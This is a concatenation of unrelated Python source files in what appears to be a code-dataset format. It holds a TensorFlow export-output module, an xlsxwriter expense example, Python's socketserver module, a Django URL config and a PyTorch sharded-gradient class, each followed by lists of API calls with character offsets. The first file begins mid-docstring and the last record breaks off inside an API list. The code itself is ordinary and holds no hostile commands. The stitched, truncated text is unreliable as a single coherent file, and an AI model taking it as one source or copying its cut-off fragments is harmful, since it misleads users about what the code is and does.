Args:
receiver_tensors: a `Tensor`, or a dict of string to `Tensor`, specifying
input nodes that will be fed.
"""
pass
class ClassificationOutput(ExportOutput):
"""Represents the output of a classification head.
Either classes or scores or both must be set.
The classes `Tensor` must provide string labels, not integer class IDs.
If only classes is set, it is interpreted as providing top-k results in
descending order.
If only scores is set, it is interpreted as providing a score for every class
in order of class ID.
If both classes and scores are set, they are interpreted as zipped, so each
score corresponds to the class at the same index. Clients should not depend
on the order of the entries.
"""
def __init__(self, scores=None, classes=None):
"""Constructor for `ClassificationOutput`.
Args:
scores: A float `Tensor` giving scores (sometimes but not always
interpretable as probabilities) for each class. May be `None`, but
only if `classes` is set. Interpretation varies-- see class doc.
classes: A string `Tensor` giving predicted class labels. May be `None`,
but only if `scores` is set. Interpretation varies-- see class doc.
Raises:
ValueError: if neither classes nor scores is set, or one of them is not a
`Tensor` with the correct dtype.
"""
if (scores is not None
and not (isinstance(scores, ops.Tensor)
and scores.dtype.is_floating)):
raise ValueError('Classification scores must be a float32 Tensor; '
'got {}'.format(scores))
if (classes is not None
and not (isinstance(classes, ops.Tensor)
and dtypes.as_dtype(classes.dtype) == dtypes.string)):
raise ValueError('Classification classes must be a string Tensor; '
'got {}'.format(classes))
if scores is None and classes is None:
raise ValueError('At least one of scores and classes must be set.')
self._scores = scores
self._classes = classes
@property
def scores(self):
return self._scores
@property
def classes(self):
return self._classes
def as_signature_def(self, receiver_tensors):
if len(receiver_tensors) != 1:
raise ValueError('Classification input must be a single string Tensor; '
'got {}'.format(receiver_tensors))
(_, examples), = receiver_tensors.items()
if dtypes.as_dtype(examples.dtype) != dtypes.string:
raise ValueError('Classification input must be a single string Tensor; '
'got {}'.format(receiver_tensors))
return signature_def_utils.classification_signature_def(
examples, self.classes, self.scores)
class RegressionOutput(ExportOutput):
"""Represents the output of a regression head."""
def __init__(self, value):
"""Constructor for `RegressionOutput`.
Args:
value: a float `Tensor` giving the predicted values. Required.
Raises:
ValueError: if the value is not a `Tensor` with dtype tf.float32.
"""
if not (isinstance(value, ops.Tensor) and value.dtype.is_floating):
raise ValueError('Regression output value must be a float32 Tensor; '
'got {}'.format(value))
self._value = value
@property
def value(self):
return self._value
def as_signature_def(self, receiver_tensors):
if len(receiver_tensors) != 1:
raise ValueError('Regression input must be a single string Tensor; '
'got {}'.format(receiver_tensors))
(_, examples), = receiver_tensors.items()
if dtypes.as_dtype(examples.dtype) != dtypes.string:
raise ValueError('Regression input must be a single string Tensor; '
'got {}'.format(receiver_tensors))
return signature_def_utils.regression_signature_def(examples, self.value)
class PredictOutput(ExportOutput):
"""Represents the output of a generic prediction head.
A generic prediction need not be either a classification or a regression.
Named outputs must be provided as a dict from string to `Tensor`,
"""
def __init__(self, outputs):
"""Constructor for PredictOutput.
Args:
outputs: A dict of string to `Tensor` representing the predictions.
Raises:
ValueError: if the outputs is not dict, or any of its keys are not
strings, or any of its values are not `Tensor`s.
"""
if not isinstance(outputs, dict):
raise ValueError(
'Prediction outputs must be given as a dict of string to Tensor; '
'got {}'.format(outputs))
for key, value in outputs.items():
if not isinstance(key, six.string_types):
raise ValueError(
'Prediction output key must be a string; got {}.'.format(key))
if not isinstance(value, ops.Tensor):
raise ValueError(
'Prediction output value must be a Tensor; got {}.'.format(value))
self._outputs = outputs
@property
def outputs(self):
return self._outputs
def as_signature_def(self, receiver_tensors):
return signature_def_utils.predict_signature_def(receiver_tensors,
self.outputs)
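# Usage sketch (values are illustrative only and assume `import tensorflow as tf`;
# dtypes follow the checks in ClassificationOutput.__init__):
#     scores = tf.constant([[0.1, 0.9]], dtype=tf.float32)
#     classes = tf.constant([['cat', 'dog']])
#     export_output = ClassificationOutput(scores=scores, classes=classes)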
| [
"tensorflow.python.saved_model.signature_def_utils.regression_signature_def",
"tensorflow.python.framework.dtypes.as_dtype",
"tensorflow.python.saved_model.signature_def_utils.classification_signature_def",
"tensorflow.python.saved_model.signature_def_utils.predict_signature_def"
] | [((4153, 4242), 'tensorflow.python.saved_model.signature_def_utils.classification_signature_def', 'signature_def_utils.classification_signature_def', (['examples', 'self.classes', 'self.scores'], {}), '(examples, self.classes,\n self.scores)\n', (4201, 4242), False, 'from tensorflow.python.saved_model import signature_def_utils\n'), ((5325, 5391), 'tensorflow.python.saved_model.signature_def_utils.regression_signature_def', 'signature_def_utils.regression_signature_def', (['examples', 'self.value'], {}), '(examples, self.value)\n', (5369, 5391), False, 'from tensorflow.python.saved_model import signature_def_utils\n'), ((6605, 6678), 'tensorflow.python.saved_model.signature_def_utils.predict_signature_def', 'signature_def_utils.predict_signature_def', (['receiver_tensors', 'self.outputs'], {}), '(receiver_tensors, self.outputs)\n', (6646, 6678), False, 'from tensorflow.python.saved_model import signature_def_utils\n'), ((3955, 3986), 'tensorflow.python.framework.dtypes.as_dtype', 'dtypes.as_dtype', (['examples.dtype'], {}), '(examples.dtype)\n', (3970, 3986), False, 'from tensorflow.python.framework import dtypes\n'), ((5131, 5162), 'tensorflow.python.framework.dtypes.as_dtype', 'dtypes.as_dtype', (['examples.dtype'], {}), '(examples.dtype)\n', (5146, 5162), False, 'from tensorflow.python.framework import dtypes\n'), ((3219, 3249), 'tensorflow.python.framework.dtypes.as_dtype', 'dtypes.as_dtype', (['classes.dtype'], {}), '(classes.dtype)\n', (3234, 3249), False, 'from tensorflow.python.framework import dtypes\n')] |
import xlsxwriter
# Create a workbook and add a worksheet.
workbook = xlsxwriter.Workbook('Expenses01.xlsx')
worksheet = workbook.add_worksheet()
# Some data we want to write to the worksheet.
expenses = (
['Rent', 1000],
['Gas', 100],
['Food', 300],
['Gym', 50],
)
# Start from the first cell. Rows and columns are zero indexed.
row = 0
col = 0
# Iterate over the data and write it out row by row.
for item, cost in (expenses):
worksheet.write(row, col, item)
worksheet.write(row, col + 1, cost)
row += 1
# Write a total using a formula.
worksheet.write(row, 0, 'Total')
worksheet.write(row, 1, '=SUM(B1:B4)')
workbook.close()
| [
"xlsxwriter.Workbook"
] | [((71, 109), 'xlsxwriter.Workbook', 'xlsxwriter.Workbook', (['"""Expenses01.xlsx"""'], {}), "('Expenses01.xlsx')\n", (90, 109), False, 'import xlsxwriter\n')] |
"""Generic socket server classes.
This module tries to capture the various aspects of defining a server:
For socket-based servers:
- address family:
- AF_INET{,6}: IP (Internet Protocol) sockets (default)
- AF_UNIX: Unix domain sockets
- others, e.g. AF_DECNET are conceivable (see <socket.h>
- socket type:
- SOCK_STREAM (reliable stream, e.g. TCP)
- SOCK_DGRAM (datagrams, e.g. UDP)
For request-based servers (including socket-based):
- client address verification before further looking at the request
(This is actually a hook for any processing that needs to look
at the request before anything else, e.g. logging)
- how to handle multiple requests:
- synchronous (one request is handled at a time)
- forking (each request is handled by a new process)
- threading (each request is handled by a new thread)
The classes in this module favor the server type that is simplest to
write: a synchronous TCP/IP server. This is bad class design, but
save some typing. (There's also the issue that a deep class hierarchy
slows down method lookups.)
There are five classes in an inheritance diagram, four of which represent
synchronous servers of four types:
+------------+
| BaseServer |
+------------+
|
v
+-----------+ +------------------+
| TCPServer |------->| UnixStreamServer |
+-----------+ +------------------+
|
v
+-----------+ +--------------------+
| UDPServer |------->| UnixDatagramServer |
+-----------+ +--------------------+
Note that UnixDatagramServer derives from UDPServer, not from
UnixStreamServer -- the only difference between an IP and a Unix
stream server is the address family, which is simply repeated in both
unix server classes.
Forking and threading versions of each type of server can be created
using the ForkingMixIn and ThreadingMixIn mix-in classes. For
instance, a threading UDP server class is created as follows:
class ThreadingUDPServer(ThreadingMixIn, UDPServer): pass
The Mix-in class must come first, since it overrides a method defined
in UDPServer! Setting the various member variables also changes
the behavior of the underlying server mechanism.
To implement a service, you must derive a class from
BaseRequestHandler and redefine its handle() method. You can then run
various versions of the service by combining one of the server classes
with your request handler class.
The request handler class must be different for datagram or stream
services. This can be hidden by using the request handler
subclasses StreamRequestHandler or DatagramRequestHandler.
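For example, a minimal echo service could be sketched roughly as follows (the
handler name and address are illustrative and not part of this module):

        class EchoHandler(StreamRequestHandler):
            def handle(self):
                # read one line from the client and send it back unchanged
                data = self.rfile.readline()
                self.wfile.write(data)

        server = ThreadingTCPServer(('localhost', 8000), EchoHandler)
        server.serve_forever()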
Of course, you still have to use your head!
For instance, it makes no sense to use a forking server if the service
contains state in memory that can be modified by requests (since the
modifications in the child process would never reach the initial state
kept in the parent process and passed to each child). In this case,
you can use a threading server, but you will probably have to use
locks to avoid two requests that come in nearly simultaneous to apply
conflicting changes to the server state.
On the other hand, if you are building e.g. an HTTP server, where all
data is stored externally (e.g. in the file system), a synchronous
class will essentially render the service "deaf" while one request is
being handled -- which may be for a very long time if a client is slow
to read all the data it has requested. Here a threading or forking
server is appropriate.
In some cases, it may be appropriate to process part of a request
synchronously, but to finish processing in a forked child depending on
the request data. This can be implemented by using a synchronous
server and doing an explicit fork in the request handler class
handle() method.
Another approach to handling multiple simultaneous requests in an
environment that supports neither threads nor fork (or where these are
too expensive or inappropriate for the service) is to maintain an
explicit table of partially finished requests and to use a selector to
decide which request to work on next (or whether to handle a new
incoming request). This is particularly important for stream services
where each client can potentially be connected for a long time (if
threads or subprocesses cannot be used).
Future work:
- Standard classes for Sun RPC (which uses either UDP or TCP)
- Standard mix-in classes to implement various authentication
and encryption schemes
XXX Open problems:
- What to do with out-of-band data?
BaseServer:
- split generic "request" functionality out into BaseServer class.
Copyright (C) 2000 <NAME> <<EMAIL>>
example: read entries from a SQL database (requires overriding
get_request() to return a table entry from the database).
Each entry is processed by a RequestHandlerClass.
"""
# Author of the BaseServer patch: <NAME>
# XXX Warning!
# There is a test suite for this module, but it cannot be run by the
# standard regression test.
# To run it manually, run Lib/test/test_socketserver.py.
__version__ = "0.4"
import socket
import selectors
import os
import errno
try:
import threading
except ImportError:
import dummy_threading as threading
try:
from time import monotonic as time
except ImportError:
from time import time as time
__all__ = ["TCPServer","UDPServer","ForkingUDPServer","ForkingTCPServer",
"ThreadingUDPServer","ThreadingTCPServer","BaseRequestHandler",
"StreamRequestHandler","DatagramRequestHandler",
"ThreadingMixIn", "ForkingMixIn"]
if hasattr(socket, "AF_UNIX"):
__all__.extend(["UnixStreamServer","UnixDatagramServer",
"ThreadingUnixStreamServer",
"ThreadingUnixDatagramServer"])
# poll/select have the advantage of not requiring any extra file descriptor,
# contrarily to epoll/kqueue (also, they require a single syscall).
if hasattr(selectors, 'PollSelector'):
_ServerSelector = selectors.PollSelector
else:
_ServerSelector = selectors.SelectSelector
class BaseServer:
"""Base class for server classes.
Methods for the caller:
- __init__(server_address, RequestHandlerClass)
- serve_forever(poll_interval=0.5)
- shutdown()
- handle_request() # if you do not use serve_forever()
- fileno() -> int # for selector
Methods that may be overridden:
- server_bind()
- server_activate()
- get_request() -> request, client_address
- handle_timeout()
- verify_request(request, client_address)
- server_close()
- process_request(request, client_address)
- shutdown_request(request)
- close_request(request)
- service_actions()
- handle_error()
Methods for derived classes:
- finish_request(request, client_address)
Class variables that may be overridden by derived classes or
instances:
- timeout
- address_family
- socket_type
- allow_reuse_address
Instance variables:
- RequestHandlerClass
- socket
"""
timeout = None
def __init__(self, server_address, RequestHandlerClass):
"""Constructor. May be extended, do not override."""
self.server_address = server_address
self.RequestHandlerClass = RequestHandlerClass
self.__is_shut_down = threading.Event()
self.__shutdown_request = False
def server_activate(self):
"""Called by constructor to activate the server.
May be overridden.
"""
pass
def serve_forever(self, poll_interval=0.5):
"""Handle one request at a time until shutdown.
Polls for shutdown every poll_interval seconds. Ignores
self.timeout. If you need to do periodic tasks, do them in
another thread.
"""
self.__is_shut_down.clear()
try:
# XXX: Consider using another file descriptor or connecting to the
# socket to wake this up instead of polling. Polling reduces our
# responsiveness to a shutdown request and wastes cpu at all other
# times.
with _ServerSelector() as selector:
selector.register(self, selectors.EVENT_READ)
while not self.__shutdown_request:
ready = selector.select(poll_interval)
if ready:
self._handle_request_noblock()
self.service_actions()
finally:
self.__shutdown_request = False
self.__is_shut_down.set()
def shutdown(self):
"""Stops the serve_forever loop.
Blocks until the loop has finished. This must be called while
serve_forever() is running in another thread, or it will
deadlock.
"""
self.__shutdown_request = True
self.__is_shut_down.wait()
def service_actions(self):
"""Called by the serve_forever() loop.
May be overridden by a subclass / Mixin to implement any code that
needs to be run during the loop.
"""
pass
# The distinction between handling, getting, processing and finishing a
# request is fairly arbitrary. Remember:
#
# - handle_request() is the top-level call. It calls selector.select(),
# get_request(), verify_request() and process_request()
# - get_request() is different for stream or datagram sockets
# - process_request() is the place that may fork a new process or create a
# new thread to finish the request
# - finish_request() instantiates the request handler class; this
# constructor will handle the request all by itself
def handle_request(self):
"""Handle one request, possibly blocking.
Respects self.timeout.
"""
# Support people who used socket.settimeout() to escape
# handle_request before self.timeout was available.
timeout = self.socket.gettimeout()
if timeout is None:
timeout = self.timeout
elif self.timeout is not None:
timeout = min(timeout, self.timeout)
if timeout is not None:
deadline = time() + timeout
# Wait until a request arrives or the timeout expires - the loop is
        # necessary to accommodate early wakeups due to EINTR.
with _ServerSelector() as selector:
selector.register(self, selectors.EVENT_READ)
while True:
ready = selector.select(timeout)
if ready:
return self._handle_request_noblock()
else:
if timeout is not None:
timeout = deadline - time()
if timeout < 0:
return self.handle_timeout()
def _handle_request_noblock(self):
"""Handle one request, without blocking.
I assume that selector.select() has returned that the socket is
readable before this function was called, so there should be no risk of
blocking in get_request().
"""
try:
request, client_address = self.get_request()
except OSError:
return
if self.verify_request(request, client_address):
try:
self.process_request(request, client_address)
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
def handle_timeout(self):
"""Called if no new request arrives within self.timeout.
Overridden by ForkingMixIn.
"""
pass
def verify_request(self, request, client_address):
"""Verify the request. May be overridden.
Return True if we should proceed with this request.
"""
return True
def process_request(self, request, client_address):
"""Call finish_request.
Overridden by ForkingMixIn and ThreadingMixIn.
"""
self.finish_request(request, client_address)
self.shutdown_request(request)
def server_close(self):
"""Called to clean-up the server.
May be overridden.
"""
pass
def finish_request(self, request, client_address):
"""Finish one request by instantiating RequestHandlerClass."""
self.RequestHandlerClass(request, client_address, self)
def shutdown_request(self, request):
"""Called to shutdown and close an individual request."""
self.close_request(request)
def close_request(self, request):
"""Called to clean up an individual request."""
pass
def handle_error(self, request, client_address):
"""Handle an error gracefully. May be overridden.
The default is to print a traceback and continue.
"""
print('-'*40)
print('Exception happened during processing of request from', end=' ')
print(client_address)
import traceback
traceback.print_exc() # XXX But this goes to stderr!
print('-'*40)
class TCPServer(BaseServer):
"""Base class for various socket-based server classes.
Defaults to synchronous IP stream (i.e., TCP).
Methods for the caller:
- __init__(server_address, RequestHandlerClass, bind_and_activate=True)
- serve_forever(poll_interval=0.5)
- shutdown()
- handle_request() # if you don't use serve_forever()
- fileno() -> int # for selector
Methods that may be overridden:
- server_bind()
- server_activate()
- get_request() -> request, client_address
- handle_timeout()
- verify_request(request, client_address)
- process_request(request, client_address)
- shutdown_request(request)
- close_request(request)
- handle_error()
Methods for derived classes:
- finish_request(request, client_address)
Class variables that may be overridden by derived classes or
instances:
- timeout
- address_family
- socket_type
- request_queue_size (only for stream sockets)
- allow_reuse_address
Instance variables:
- server_address
- RequestHandlerClass
- socket
"""
address_family = socket.AF_INET
socket_type = socket.SOCK_STREAM
request_queue_size = 5
allow_reuse_address = False
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
"""Constructor. May be extended, do not override."""
BaseServer.__init__(self, server_address, RequestHandlerClass)
self.socket = socket.socket(self.address_family,
self.socket_type)
if bind_and_activate:
self.server_bind()
self.server_activate()
def server_bind(self):
"""Called by constructor to bind the socket.
May be overridden.
"""
if self.allow_reuse_address:
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
self.server_address = self.socket.getsockname()
def server_activate(self):
"""Called by constructor to activate the server.
May be overridden.
"""
self.socket.listen(self.request_queue_size)
def server_close(self):
"""Called to clean-up the server.
May be overridden.
"""
self.socket.close()
def fileno(self):
"""Return socket file number.
Interface required by selector.
"""
return self.socket.fileno()
def get_request(self):
"""Get the request and client address from the socket.
May be overridden.
"""
return self.socket.accept()
def shutdown_request(self, request):
"""Called to shutdown and close an individual request."""
try:
#explicitly shutdown. socket.close() merely releases
#the socket and waits for GC to perform the actual close.
request.shutdown(socket.SHUT_WR)
except OSError:
pass #some platforms may raise ENOTCONN here
self.close_request(request)
def close_request(self, request):
"""Called to clean up an individual request."""
request.close()
class UDPServer(TCPServer):
"""UDP server class."""
allow_reuse_address = False
socket_type = socket.SOCK_DGRAM
max_packet_size = 8192
def get_request(self):
data, client_addr = self.socket.recvfrom(self.max_packet_size)
return (data, self.socket), client_addr
def server_activate(self):
# No need to call listen() for UDP.
pass
def shutdown_request(self, request):
# No need to shutdown anything.
self.close_request(request)
def close_request(self, request):
# No need to close anything.
pass
class ForkingMixIn:
"""Mix-in class to handle each request in a new process."""
timeout = 300
active_children = None
max_children = 40
def collect_children(self):
"""Internal routine to wait for children that have exited."""
if self.active_children is None: return
while len(self.active_children) >= self.max_children:
# XXX: This will wait for any child process, not just ones
# spawned by this library. This could confuse other
# libraries that expect to be able to wait for their own
# children.
try:
pid, status = os.waitpid(0, 0)
except OSError:
pid = None
if pid not in self.active_children: continue
self.active_children.remove(pid)
# XXX: This loop runs more system calls than it ought
# to. There should be a way to put the active_children into a
# process group and then use os.waitpid(-pgid) to wait for any
# of that set, but I couldn't find a way to allocate pgids
# that couldn't collide.
for child in self.active_children:
try:
pid, status = os.waitpid(child, os.WNOHANG)
except OSError:
pid = None
if not pid: continue
try:
self.active_children.remove(pid)
except ValueError as e:
                raise ValueError('%s. x=%d and list=%r' % (e, pid,
self.active_children))
def handle_timeout(self):
"""Wait for zombies after self.timeout seconds of inactivity.
May be extended, do not override.
"""
self.collect_children()
def service_actions(self):
"""Collect the zombie child processes regularly in the ForkingMixIn.
        service_actions is called in the BaseServer's serve_forever loop.
"""
self.collect_children()
def process_request(self, request, client_address):
"""Fork a new subprocess to process the request."""
pid = os.fork()
if pid:
# Parent process
if self.active_children is None:
self.active_children = []
self.active_children.append(pid)
self.close_request(request)
return
else:
# Child process.
# This must never return, hence os._exit()!
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
os._exit(0)
except:
try:
self.handle_error(request, client_address)
self.shutdown_request(request)
finally:
os._exit(1)
class ThreadingMixIn:
"""Mix-in class to handle each request in a new thread."""
# Decides how threads will act upon termination of the
# main process
daemon_threads = False
def process_request_thread(self, request, client_address):
"""Same as in BaseServer but as a thread.
In addition, exception handling is done here.
"""
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
def process_request(self, request, client_address):
"""Start a new thread to process the request."""
t = threading.Thread(target = self.process_request_thread,
args = (request, client_address))
t.daemon = self.daemon_threads
t.start()
class ForkingUDPServer(ForkingMixIn, UDPServer): pass
class ForkingTCPServer(ForkingMixIn, TCPServer): pass
class ThreadingUDPServer(ThreadingMixIn, UDPServer): pass
class ThreadingTCPServer(ThreadingMixIn, TCPServer): pass
if hasattr(socket, 'AF_UNIX'):
class UnixStreamServer(TCPServer):
address_family = socket.AF_UNIX
class UnixDatagramServer(UDPServer):
address_family = socket.AF_UNIX
class ThreadingUnixStreamServer(ThreadingMixIn, UnixStreamServer): pass
class ThreadingUnixDatagramServer(ThreadingMixIn, UnixDatagramServer): pass
class BaseRequestHandler:
"""Base class for request handler classes.
This class is instantiated for each request to be handled. The
constructor sets the instance variables request, client_address
and server, and then calls the handle() method. To implement a
specific service, all you need to do is to derive a class which
defines a handle() method.
The handle() method can find the request as self.request, the
client address as self.client_address, and the server (in case it
needs access to per-server information) as self.server. Since a
separate instance is created for each request, the handle() method
    can define arbitrary other instance variables.
"""
def __init__(self, request, client_address, server):
self.request = request
self.client_address = client_address
self.server = server
self.setup()
try:
self.handle()
finally:
self.finish()
def setup(self):
pass
def handle(self):
pass
def finish(self):
pass
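# Illustrative sketch, not part of the original module: a minimal service built
# on BaseRequestHandler.  The handler class, helper function, host and port
# below are assumptions made up for this example.
class _ExampleEchoHandler(BaseRequestHandler):
    """Echo back whatever a TCP client sends (example only)."""
    def handle(self):
        # For TCP servers, self.request is the connected socket object.
        data = self.request.recv(1024)
        self.request.sendall(data)
def _run_example_echo_server(host='127.0.0.1', port=9999):
    """Serve the example handler, one thread per request (example only)."""
    ThreadingTCPServer((host, port), _ExampleEchoHandler).serve_forever()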
# The following two classes make it possible to use the same service
# class for stream or datagram servers.
# Each class sets up these instance variables:
# - rfile: a file object from which the request is read
# - wfile: a file object to which the reply is written
# When the handle() method returns, wfile is flushed properly
class StreamRequestHandler(BaseRequestHandler):
"""Define self.rfile and self.wfile for stream sockets."""
# Default buffer sizes for rfile, wfile.
# We default rfile to buffered because otherwise it could be
# really slow for large data (a getc() call per byte); we make
# wfile unbuffered because (a) often after a write() we want to
# read and we need to flush the line; (b) big writes to unbuffered
# files are typically optimized by stdio even when big reads
# aren't.
rbufsize = -1
wbufsize = 0
# A timeout to apply to the request socket, if not None.
timeout = None
# Disable nagle algorithm for this socket, if True.
# Use only when wbufsize != 0, to avoid small packets.
disable_nagle_algorithm = False
def setup(self):
self.connection = self.request
if self.timeout is not None:
self.connection.settimeout(self.timeout)
if self.disable_nagle_algorithm:
self.connection.setsockopt(socket.IPPROTO_TCP,
socket.TCP_NODELAY, True)
self.rfile = self.connection.makefile('rb', self.rbufsize)
self.wfile = self.connection.makefile('wb', self.wbufsize)
def finish(self):
if not self.wfile.closed:
try:
self.wfile.flush()
except socket.error:
                # A final socket error may have occurred here, such as
# the local error ECONNABORTED.
pass
self.wfile.close()
self.rfile.close()
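# Illustrative sketch, not part of the original module: a line-oriented handler
# built on StreamRequestHandler; it relies on the rfile/wfile objects created in
# setup() above.  The class name and behaviour are assumptions for the example.
class _ExampleLineUpperHandler(StreamRequestHandler):
    """Read one line from the client and reply with it upper-cased (example only)."""
    def handle(self):
        line = self.rfile.readline()    # request bytes are read from rfile
        self.wfile.write(line.upper())  # the reply is written to wfile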
class DatagramRequestHandler(BaseRequestHandler):
# XXX Regrettably, I cannot get this working on Linux;
# s.recvfrom() doesn't return a meaningful client address.
"""Define self.rfile and self.wfile for datagram sockets."""
def setup(self):
from io import BytesIO
self.packet, self.socket = self.request
self.rfile = BytesIO(self.packet)
self.wfile = BytesIO()
def finish(self):
self.socket.sendto(self.wfile.getvalue(), self.client_address)
| [
"dummy_threading.Thread",
"socket.socket",
"os.waitpid",
"io.BytesIO",
"os._exit",
"dummy_threading.Event",
"os.fork",
"traceback.print_exc",
"time.time"
] | [((7416, 7433), 'dummy_threading.Event', 'threading.Event', ([], {}), '()\n', (7431, 7433), True, 'import dummy_threading as threading\n'), ((13072, 13093), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (13091, 13093), False, 'import traceback\n'), ((14642, 14694), 'socket.socket', 'socket.socket', (['self.address_family', 'self.socket_type'], {}), '(self.address_family, self.socket_type)\n', (14655, 14694), False, 'import socket\n'), ((19078, 19087), 'os.fork', 'os.fork', ([], {}), '()\n', (19085, 19087), False, 'import os\n'), ((20516, 20604), 'dummy_threading.Thread', 'threading.Thread', ([], {'target': 'self.process_request_thread', 'args': '(request, client_address)'}), '(target=self.process_request_thread, args=(request,\n client_address))\n', (20532, 20604), True, 'import dummy_threading as threading\n'), ((24630, 24650), 'io.BytesIO', 'BytesIO', (['self.packet'], {}), '(self.packet)\n', (24637, 24650), False, 'from io import BytesIO\n'), ((24672, 24681), 'io.BytesIO', 'BytesIO', ([], {}), '()\n', (24679, 24681), False, 'from io import BytesIO\n'), ((10251, 10257), 'time.time', 'time', ([], {}), '()\n', (10255, 10257), True, 'from time import time as time\n'), ((17587, 17603), 'os.waitpid', 'os.waitpid', (['(0)', '(0)'], {}), '(0, 0)\n', (17597, 17603), False, 'import os\n'), ((18155, 18184), 'os.waitpid', 'os.waitpid', (['child', 'os.WNOHANG'], {}), '(child, os.WNOHANG)\n', (18165, 18184), False, 'import os\n'), ((19564, 19575), 'os._exit', 'os._exit', (['(0)'], {}), '(0)\n', (19572, 19575), False, 'import os\n'), ((19776, 19787), 'os._exit', 'os._exit', (['(1)'], {}), '(1)\n', (19784, 19787), False, 'import os\n'), ((10778, 10784), 'time.time', 'time', ([], {}), '()\n', (10782, 10784), True, 'from time import time as time\n')] |
#!/usr/bin/env python
# coding=utf-8
from django.conf.urls import patterns, url
from ma import views
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'cat.views.home', name='home'),
# url(r'^cat/', include('cat.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
# url(r'^admin/', include(admin.site.urls)),
url(r'^home/$', views.home),
url(r'^pwd/$', views.pwd),
url(r'^user/add', views.userAdd),
url(r'^userTypes/', views.userTypes),
url(r'^login/', views.login),
url(r'^menu/', views.menu),
)
| [
"django.conf.urls.url"
] | [((600, 626), 'django.conf.urls.url', 'url', (['"""^home/$"""', 'views.home'], {}), "('^home/$', views.home)\n", (603, 626), False, 'from django.conf.urls import patterns, url\n'), ((633, 657), 'django.conf.urls.url', 'url', (['"""^pwd/$"""', 'views.pwd'], {}), "('^pwd/$', views.pwd)\n", (636, 657), False, 'from django.conf.urls import patterns, url\n'), ((664, 695), 'django.conf.urls.url', 'url', (['"""^user/add"""', 'views.userAdd'], {}), "('^user/add', views.userAdd)\n", (667, 695), False, 'from django.conf.urls import patterns, url\n'), ((702, 737), 'django.conf.urls.url', 'url', (['"""^userTypes/"""', 'views.userTypes'], {}), "('^userTypes/', views.userTypes)\n", (705, 737), False, 'from django.conf.urls import patterns, url\n'), ((744, 771), 'django.conf.urls.url', 'url', (['"""^login/"""', 'views.login'], {}), "('^login/', views.login)\n", (747, 771), False, 'from django.conf.urls import patterns, url\n'), ((778, 803), 'django.conf.urls.url', 'url', (['"""^menu/"""', 'views.menu'], {}), "('^menu/', views.menu)\n", (781, 803), False, 'from django.conf.urls import patterns, url\n')] |
from typing import Optional
import torch
import torch.nn as nn
from torch.nn.parameter import Parameter
class ShardedGradient:
def __init__(self,
param: Parameter,
sharded_module: nn.Module,
offload_config: Optional[dict] = None
) -> None:
assert hasattr(
param, 'ca_attr') and param.ca_attr.is_sharded, 'ShardedGradient can only be initialized with sharded parameter'
self.param = param
self.sharded_module = sharded_module
self.offload_config = offload_config
self._cpu_offload = offload_config.get('device', None) == 'cpu' if offload_config else False
# _gpu_grad is either sharded or not
# all saved grads are fp32
self._gpu_grad: Optional[torch.Tensor] = None
self._cpu_grad: Optional[torch.Tensor] = None
if self._cpu_offload:
# this buffer will be held and reused every iteration
self._cpu_grad = torch.zeros(param.ca_attr.payload('cpu'), dtype=torch.float).pin_memory()
@torch.no_grad()
def setup(self) -> None:
"""This function will be called pre-backward. Save the local accumulated gradient to _gpu_grad.
        When no_sync() is enabled (_require_backward_grad_sync=False), the grad is accumulated locally in param.grad
:raises AssertionError: Raise if grad shape is wrong
"""
if self.sharded_module._require_backward_grad_sync and self.param.grad is not None:
if self.param.grad.device != self.param.data.device:
# TODO: offload?
raise RuntimeError(
                    f'grad and param are on different device, grad {self.param.grad.device} vs. param {self.param.data.device}')
else:
self._gpu_grad = self.param.grad.data
self.param.grad = None
def reduce_scatter_callback(self, reduced_grad: torch.Tensor) -> None:
"""This function will be called in post-backward hook, so we cannot modify param.grad directly
:param reduced_grad: the reduced grad
:type reduced_grad: torch.Tensor
"""
# Make sure we store fp32 grad
if torch.is_floating_point(reduced_grad) and reduced_grad.dtype != torch.float:
reduced_grad.data = reduced_grad.data.to(torch.float)
if self._gpu_grad is None:
self._gpu_grad = reduced_grad.data
else:
self._gpu_grad += reduced_grad.data
# Optionally move gradients to CPU, typically used if one is running the optimizer on the CPU. Once the full
# backwards pass completes, we will set `.grad` to the CPU copy.
if self._cpu_offload:
self._cpu_grad.copy_(self._gpu_grad.data, non_blocking=True)
# Don't let this memory get reused until after the transfer.
self._gpu_grad.data.record_stream(torch.cuda.current_stream())
@torch.no_grad()
def write_back(self) -> None:
"""This function will be called in final backward hook
"""
if self._cpu_grad is not None:
assert self.param.device == torch.device(
'cpu'), f'Incorrect param device, expected CPU, got {self.param.device}'
self.param.grad.data = self._cpu_grad
elif self._gpu_grad is not None:
assert self.param.device == self._gpu_grad.device, f'Incorrect _gpu_grad device, param on {self.param.device} but _gpu_grad on {self._gpu_grad.device}'
self.param.grad.data = self._gpu_grad
else:
raise RuntimeError('No grad to write back')
# If using CPU offload, _cpu_grad will store the CPU tensor of _gpu_grad
# They should be released here
self._gpu_grad = None
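# Illustrative sketch, not part of the original file: the intended call order for
# a ShardedGradient across one training iteration.  `param` is assumed to already
# carry a sharded `ca_attr`, `module` is the owning sharded module and
# `reduced_tensor` is the fp32 result of the reduce-scatter; all three names are
# example inputs rather than objects defined in this file.
def _example_sharded_grad_lifecycle(param, module, reduced_tensor):
    grad = ShardedGradient(param, module, offload_config=None)
    grad.setup()                                  # pre-backward: stash any locally accumulated grad
    grad.reduce_scatter_callback(reduced_tensor)  # post-backward hook: accumulate the reduced shard
    grad.write_back()                             # final backward hook: expose the result on param.grad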
| [
"torch.is_floating_point",
"torch.no_grad",
"torch.cuda.current_stream",
"torch.device"
